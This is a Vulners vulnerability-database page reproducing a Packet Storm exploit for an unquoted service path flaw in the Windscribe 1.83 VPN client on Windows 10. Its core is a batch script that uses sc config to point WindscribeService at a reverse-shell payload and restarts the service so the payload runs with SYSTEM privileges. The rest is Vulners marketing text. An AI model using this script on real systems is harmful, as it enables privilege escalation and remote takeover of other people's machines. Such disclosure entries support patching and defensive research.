Lucene search
K

Windscribe 1.83 Unquoted Service Path

🗓️ 28 Jun 2020 00:00:00Reported by Ethan SeowType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 159 Views

Windscribe 1.83 Unquoted Service Path exploit on Windows 1

Code
`# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path  
# Date: 2020-06-26  
# Exploit Author: Ethan Seow  
# Vendor Homepage: https://windscribe.com  
# Version: v1.83 Build 20  
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363  
  
  
#filename : exploit.bat  
  
#Code start  
@echo off  
  
sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g.  
C:\Users\Public\payload.exe}"  
sc stop WindscribeService  
sc start WindscribeService  
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD  
pause  
  
#Code end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2020 00:00Current
0.2Low risk
Vulners AI Score0.2
159